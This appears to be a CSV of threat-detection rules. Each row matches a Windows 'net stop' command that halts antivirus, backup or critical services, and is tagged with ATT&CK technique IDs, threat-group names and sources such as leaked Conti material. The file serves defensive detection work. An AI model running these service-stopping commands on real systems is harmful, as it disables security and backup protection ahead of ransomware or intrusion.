"*net stop Antivirus*",".{0,1000}net\sstop\sAntivirus.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ARSM /y*",".{0,1000}net\sstop\sARSM\s\/y.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop arsm*",".{0,1000}net\sstop\sarsm.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop AVP*",".{0,1000}net\sstop\sAVP.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop backp*",".{0,1000}net\sstop\sbackp.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop backup*",".{0,1000}net\sstop\sbackup.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop BackupExec*",".{0,1000}net\sstop\sBackupExec.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop BackupExecAgent*",".{0,1000}net\sstop\sBackupExecAgent.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop badrv*",".{0,1000}net\sstop\sbadrv.{0,1000}","greyware_tool_keyword","net","Wannacry Ransomware & NOODLERAT behavior","T1486 - T1490","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Malware","https://www.virustotal.com/gui/file/cde4ca499282045eecd4fc15ac80a232294556a59b3c8c8a7a593e8333cfd3c7/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop bedbg /y*",".{0,1000}net\sstop\sbedbg\s\/y.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop cbservi*",".{0,1000}net\sstop\scbservi.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop cbvscserv*",".{0,1000}net\sstop\scbvscserv.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop DCAgent*",".{0,1000}net\sstop\sDCAgent.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop EhttpSrv*",".{0,1000}net\sstop\sEhttpSrv.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ekrn*",".{0,1000}net\sstop\sekrn.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop EPSecurityService*    ",".{0,1000}net\sstop\sEPSecurityService.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop EPUpdateService*       ",".{0,1000}net\sstop\sEPUpdateService.{0,1000}\s\s\s\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop EsgShKernel*",".{0,1000}net\sstop\sEsgShKernel.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop ESHASRV*",".{0,1000}net\sstop\sESHASRV.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop FA_Scheduler*",".{0,1000}net\sstop\sFA_Scheduler.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop firebirdguardiandefaultinstance*",".{0,1000}net\sstop\sfirebirdguardiandefaultinstance.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop ibmiasrw*",".{0,1000}net\sstop\sibmiasrw.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop IISADMIN*",".{0,1000}net\sstop\sIISADMIN.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop IISADMIN*",".{0,1000}net\sstop\sIISADMIN.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*net stop IMAP4Svc*",".{0,1000}net\sstop\sIMAP4Svc.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop KAVFS*",".{0,1000}net\sstop\sKAVFS.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop KAVFSGT*",".{0,1000}net\sstop\sKAVFSGT.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop kavfsslp*",".{0,1000}net\sstop\skavfsslp.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop klnagent*",".{0,1000}net\sstop\sklnagent.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop macmnsvc*",".{0,1000}net\sstop\smacmnsvc.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop masvc*",".{0,1000}net\sstop\smasvc.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MBAMService*",".{0,1000}net\sstop\sMBAMService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop MBEndpointAgent*    ",".{0,1000}net\sstop\sMBEndpointAgent.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop McAfeeEngineService*    ",".{0,1000}net\sstop\sMcAfeeEngineService.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop McAfeeFramework*",".{0,1000}net\sstop\sMcAfeeFramework.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop McAfeeFrameworkMcAfeeFramework*",".{0,1000}net\sstop\sMcAfeeFrameworkMcAfeeFramework.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
"*net stop McShield*",".{0,1000}net\sstop\sMcShield.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z"
